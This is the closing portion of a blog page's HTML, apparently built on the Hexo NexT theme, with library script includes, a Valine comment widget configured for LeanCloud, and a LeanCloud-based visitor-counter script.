    <script type="text/javascript" src="//cdn.jsdelivr.net/fastclick/1.0.6/fastclick.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/jquery.lazyload/1.9.3/jquery.lazyload.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/velocity/1.2.3/velocity.ui.min.js"></script>
  

  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/fancybox/2.1.5/jquery.fancybox.pack.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'SDu2T9KUB8UY5eF5L3dfbdyt-gzGzoHsz',
        appKey: 'Q4E9nvCrlFLKhPtPLwXlkkxb',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("SDu2T9KUB8UY5eF5L3dfbdyt-gzGzoHsz", "Q4E9nvCrlFLKhPtPLwXlkkxb");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
